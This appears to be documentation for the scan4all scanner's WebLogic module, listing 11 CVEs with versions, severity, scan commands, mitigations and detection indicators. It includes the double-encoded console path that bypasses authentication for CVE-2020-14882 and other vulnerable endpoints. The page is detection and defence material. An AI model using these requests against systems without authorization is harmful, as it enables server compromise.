Overview Oracle WebLogic Server is a Java EE application server. scan4all includes POCs for 11 different Weblogic vulnerabilities spanning from 2014 to 2021, covering SSRF, deserialization, and console RCE attacks.
Weblogic vulnerabilities are frequently targeted in the wild. Ensure your Weblogic servers are patched and properly configured.
Supported Vulnerabilities CVE-2014-4210 - SSRF Vulnerability
CVE-2014-4210 Type SSRF (Server-Side Request Forgery) Affected Versions 10.0.2 - 10.3.6 Discovery Date 2014 CVSS Score 5.8 (Medium)
Description: WebLogic SSRF vulnerability allows attackers to scan internal network ports and services through the UDDI explorer.Detection Method: // Checks for vulnerable UDDI explorer endpoint GET / uddiexplorer / SearchPublicRegistries . jsp
Vulnerable Path: /uddiexplorer/SearchPublicRegistries.jspCVE-2017-3506 - WLS-WSAT Component RCE
CVE-2017-3506 Type Remote Code Execution Affected Versions 10.3.6.0, 12.1.3.0, 12.2.1.0-2 Discovery Date April 2017 CVSS Score 7.4 (High)
Description: Unauthenticated remote code execution via WLS-WSAT component. Allows attackers to take control of the server through XML deserialization.Component: wls-wsat (Web Services Atomic Transactions)CVE-2017-10271 - WLS-WSAT Component RCE
CVE-2017-10271 Type Remote Code Execution Affected Versions 10.3.6.0, 12.1.3.0, 12.2.1.1-2 Discovery Date October 2017 CVSS Score 9.8 (Critical)
Description: Another critical RCE in the WLS-WSAT component. This is one of the most exploited Weblogic vulnerabilities.Impact: Complete server compromise without authenticationCVE-2018-2894 - Unrestricted File Upload
CVE-2018-2894 Type Arbitrary File Upload Affected Versions 12.1.3.0, 12.2.1.2-3 Discovery Date July 2018 CVSS Score 9.8 (Critical)
Description: Deserialization vulnerability leading to arbitrary file upload. Attackers can upload malicious files through the web service test page.Vulnerable Components:
Web Service Test Page
Configuration management
CVE-2019-2725 - Async Deserialization RCE
CVE-2019-2725 Type Deserialization RCE Affected Versions 10.3.6.0, 12.1.3.0 Discovery Date April 2019 CVSS Score 9.8 (Critical)
Description: WLS9-Async deserialization vulnerability allowing unauthenticated remote code execution.Component: _async descriptor in wls9_async_responseCVE-2019-2729 - Async Deserialization RCE
CVE-2019-2729 Type Deserialization RCE Affected Versions 10.3.6.0, 12.1.3.0 Discovery Date June 2019 CVSS Score 9.8 (Critical)
Description: Similar to CVE-2019-2725 but bypasses the initial patch. Another deserialization vulnerability in wls9_async.CVE-2019-2729 was a patch bypass for CVE-2019-2725, showing the complexity of fixing deserialization issues.
CVE-2020-2883 - IIOP/T3 Deserialization RCE
CVE-2020-2883 Type Deserialization RCE Affected Versions 10.3.6.0, 12.1.3.0, 12.2.1.3-4 Discovery Date April 2020 CVSS Score 9.8 (Critical)
Description: Deserialization vulnerability in IIOP and T3 protocols allowing remote code execution.Protocols Affected:
IIOP (Internet Inter-ORB Protocol)
T3 (WebLogic proprietary protocol)
CVE-2020-14882 - Console Authentication Bypass
CVE-2020-14882 Type Authentication Bypass / RCE Affected Versions 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0 Discovery Date October 2020 CVSS Score 9.8 (Critical)
Description: Unauthenticated remote code execution through the administration console. Allows attackers to bypass authentication and execute arbitrary code.Detection Method: GET / console / css /% 252e % 252e % 252fconsole.portal ? _nfpb = true & _pageLabel =& handle = a
Vulnerable Endpoint: WebLogic Administration ConsoleThis vulnerability was actively exploited in the wild shortly after disclosure. Immediate patching is critical.
CVE-2020-14883 - Console RCE
CVE-2020-14883 Type Remote Code Execution Affected Versions 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0 Discovery Date October 2020 CVSS Score 7.2 (High)
Description: Remote code execution via the console. Often chained with CVE-2020-14882 for full compromise.Common Attack Chain: CVE-2020-14882 → CVE-2020-14883CVE-2021-2109 - Unauthorized JNDI Access
CVE-2021-2109 Type Unauthorized Access Affected Versions 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0 Discovery Date January 2021 CVSS Score 5.9 (Medium)
Description: Unauthorized JNDI lookup allowing attackers to access restricted resources.Component: JNDI (Java Naming and Directory Interface)CNVD-C-2019-48814
CNVD-C-2019-48814 Type Oracle WebLogic Vulnerability Affected Versions Various Discovery Date 2019 Source China National Vulnerability Database
Description: Chinese National Vulnerability Database entry for Oracle WebLogic.Location: pocs_go/oracle/weblogic/CNVD-C-2019-48814.goUsage Scanning for Weblogic Vulnerabilities # Scan a single Weblogic server scan4all -h http://weblogic.example.com:7001 # Scan multiple Weblogic servers scan4all -l weblogic_servers.txt # Focus on specific CVE scan4all -h http://weblogic.example.com:7001 -poc CVE-2020-14882
Common Weblogic Ports
7001 - Default HTTP port7002 - Default HTTPS port7003-7009 - Additional managed server ports
Mitigation
Apply Oracle Security Patches
Install the latest Critical Patch Updates (CPU) from Oracle.
Disable Unnecessary Components
Disable WLS-WSAT and other unused components.
Implement Network Segmentation
Restrict access to Weblogic console and administrative interfaces.
Enable Security Features
Configure authentication, authorization, and audit logging.
Monitor for Exploitation
Watch for suspicious requests to known vulnerable endpoints.
Detection Indicators Network Indicators
Requests to /uddiexplorer/
Requests to /_async/ or /wls-wsat/
Encoded console paths: %252e%252e%252f
Unusual XML payloads with Java class names
File System Indicators
Unexpected JSP files in web directories
Modified configuration files
New user accounts
Source Code Location pocs_go/weblogic/ ├── CVE_2014_4210.go ├── CVE_2017_3506.go ├── CVE_2017_10271.go ├── CVE_2018_2894.go ├── CVE_2019_2725.go ├── CVE_2019_2729.go ├── CVE_2020_2883.go ├── CVE_2020_14882.go ├── CVE_2020_14883.go └── CVE_2021_2109.go pocs_go/oracle/weblogic/ └── CNVD-C-2019-48814.go
References All POCs are implemented for detection purposes. Responsible use and proper authorization are required.